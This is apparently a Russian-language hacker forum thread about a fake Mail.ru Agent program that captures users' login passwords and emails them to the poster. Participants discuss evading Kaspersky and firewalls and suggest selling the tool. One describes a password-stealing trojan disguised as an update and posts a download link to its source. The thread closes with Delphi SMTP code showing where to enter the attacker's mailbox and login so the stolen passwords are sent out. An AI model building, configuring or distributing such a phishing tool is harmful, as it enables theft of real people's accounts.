1) Выложил бы хотяб инструкцию как сделать такой mail-agent, есть такие юзеры которые не смогут сделать такой mail-agent Можеш сделать видео по тому как создавать такой агент 2) Еще мне интерестно обнаруживает ли твой агент Касперский (т.к я заметил что у тебя он не установлен) Вдруг он палится антивирусами.... Ну вроде все сказал...
Дай угадаю,там фейк меил агента?Который или склеен или отсылает введенные данные. Могу посоветовать делать так - лоиниться на mail.ru messenger ( 'mra.mail.ru' в фаерворе внушит юзеру доверие ) и отправлять введенные данные уже себе на акк агента
хм....вроде как ниче нового то нету Этот метод начали юзать когда мэил агент токо появился,и советую тебе продавать его и не давать паблик описание как сделать ! Покупать точно будут. Да и постучись ка сюда,255997560
Касперский не обнаруживает...стоит у меня касперский.....максимум что может его определить оутпост...только хз не проверял на оутпосте....такой способ насчет агента я лично превый раз вижу я не видел больше дубликатов таких...а прога написанна на delphi и народ кто програмиирует думаю напишет без проблем...а если я буду выкладывать видео по создаванию агента мало кто поймет......
ну думаю накидать картинок и использовать smtp каждый смодет а вот что б не палиться))и индефикацию сделать)))) 2snak3 ну ка в студию посмотрим что ты там умеешь)
Банально... но оригинальностью не пахнет, я такую же весч соорудил ещё пол года назад, но потом забросил её из-за малой эффективности, когда написал трой, который от этого самого агента пароли из реестра выковыривает, после он разросся до троя для ICQ/Miranda/Trillian/&RQ/RAS/MRA =) Если найду сорцы троя, описанного выше в своём компе (который фейк мейл агента) - скину сюды. Он и выглядит гораздо более реалистично, и защита от ввода неправильного пароля есть (три попытки ввода пароля, 2 раза рисует ошибку ввода, на 3й раз отправляет). Маскировал я его под обновление.
2Bad-XxX не ну знаешь на словах я тоже имел гейтса во все дыры)))ты хоть покажи 1/1000 всего то что описал)))я хоть продемонстрировал))для новеньких...а еще мне нравиться типа такая фраза"такое уже было 2 года назад" но не кто не выкладывал так что не ипет
Вот сцылка на фейк Мыл Агента: http://bad-xxx.jino-net.ru/UpdateMraFake.rar Выкладываю в паблик. (Антивирями и файрволлами не палится, почему файрволлами не палится - хз, сам удивляюсь =) ) ЗЫ: Для любителей скомпилить и запустить: не поленитесь хатяп в сорцы заглянуть и ввести туда своё мыло, иначе ничё работать не будет. ЗЗЫ: Картинка стоит старая, новую сами поставите ЗЗЗЫ: Трой который ICQ/Miranda/Trillian/&RQ/RAS/MRA и не надейтесь в паблике увидеть =)
на самом деле бред с 3 ошибками них не понял нах сделал????понятно почему мало эжфективности потому что чувак после 2 попыток нах кинет твою прогу))))получаеться ты пассов не получил реально бред...
Не прав. Загляни в сорцы, В ЛЮБОМ СЛУЧАЕ ДАЖЕ ПРИ НАЖАТИИ НА КНОПКУ "ОТМЕНА", если сделана хатяп одна попытка - она отправляется на мыло (по нажатию на кнопку отмена, либо после 3х попыток)
ладно кста у тя еще и после 3 ошибки у тя еще и проблема с айдисмтп конектом)))лана оставим как ты сказал))них не пашет))но за утвердительность своих слов хоть и не пашушей проги но более менее кодом молодес))
отмену не жалл...соори жал крестик и них не получал но поверь мне изменил мыло в коде.....ладно забей)
diavolos, не стоит других втаптывать в грязь, чтобы доказать что ты круче. С крестиком всё работало и работает, с коннектом на СМТП работает, токо для этого нужно код подправить (ввести своё мыло и пароль, он нужен для логина), об этом я уже писал, читай выше. Ошибок НЕТУ, токо что сам всё проверял и тестил. Всё прекрасно пашет.
Инструкция для тех, кто так и не справился: M.From.Text := '[email protected]'; //мыло M.Recipients.Add; M.Recipients.Items[0].Text := '[email protected]'; //мыло получателя M.Subject := 'Cool!!! Pass to <'+edit1.Text+combobox1.Text+'>'; IdSMTP1.AuthenticationType := atLogin; IdSMTP1.Host := 'smtp.mail.ru'; IdSMTP1.Username := 'mail_1'; //логин ([email protected]) IdSMTP1.Password := 'password'; // пароль Все подписанные поля надо править